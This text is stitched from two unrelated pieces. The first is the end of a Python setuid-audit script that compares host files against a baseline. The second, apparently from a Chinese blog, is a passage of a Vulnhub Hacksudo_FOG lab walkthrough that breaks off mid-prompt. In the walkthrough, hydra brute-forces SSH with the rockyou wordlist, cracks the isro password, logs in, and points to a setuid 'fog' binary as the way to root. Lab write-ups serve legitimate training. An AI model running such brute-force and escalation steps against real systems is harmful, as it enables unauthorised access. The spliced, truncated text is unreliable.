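    return [line.strip() for line in text.splitlines() if line.strip().startswith("/")]


def scan_setuid(root: str = "/"):
    """Walk the filesystem and return regular files with the setuid bit set.

    Unreadable directories are skipped rather than aborting the scan, so the
    function can run as an unprivileged user and still report what it can see.
    """
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_setuid(paths, baseline=BASELINE):
    """Setuid files not in the baseline: each one needs a justification or chmod u-s."""
    return sorted(set(paths) - set(baseline))


def missing_from_baseline(paths, baseline=BASELINE):
    """Baseline entries absent from the host, useful for spotting tampering or a wrong baseline."""
    return sorted(set(baseline) - set(paths))


if __name__ == "__main__":
    observed = parse_find_output(FIND_OUTPUT)
    print("unexpected:", unexpected_setuid(observed))   # ['/usr/bin/look']
    print("missing:", missing_from_baseline(observed))  # []
```

In a hardening pipeline the same diff would run against scan_setuid("/") output from each host; any path that shows up in unexpected_setuid() is either documented as intentional or has its setuid bit removed.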
Alternatively, the isro user's password can be brute-forced directly; it was cracked very quickly.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ hydra -l isro -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.210
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-22 22:10:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.210:22/
[22][ssh] host: 192.168.56.210 login: isro password: qwerty
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-22 22:10:49
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ssh isro@192.168.56.210
The authenticity of host '192.168.56.210 (192.168.56.210)' can't be established.
ED25519 key fingerprint is SHA256:FfPfu4QjjjHuWE3UZ3+9fKmCs9MSH7JibTk2QXKelwc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.210' (ED25519) to the list of known hosts.
isro@192.168.56.210's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 13 07:25:51 2021 from 192.168.43.217
isro@hacksudo:~$ id
uid=1003(isro) gid=1003(isro) groups=1003(isro)
isro@hacksudo:~$ sudo -l
[sudo] password for isro:
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$
isro@hacksudo:~$ cat user.txt
8b64d2451b7a8f3fd17390f88ea35917
isro@hacksudo:~/fog$ ls -alh
total 3.7M
drwxr-xr-x 2 isro isro 4.0K May 13 2021 .
drwxr-x--- 5 isro isro 4.0K May 13 2021 ..
-rwxr-xr-x 1 root isro 17K May 12 2021 fog
-rw-r--r-- 1 isro isro 0 May 6 2021 get
-rwxr-xr-x 1 isro isro 68K May 6 2021 ping
-rwxr-xr-x 1 isro isro 3.6M May 6 2021 python
isro@hacksudo:~/fog$
The fog program can be used to obtain root privileges; running strings on fog shows that it executes python.
┌──(root
From: https://www.cnblogs.com/jason-huawen/p/16917715.html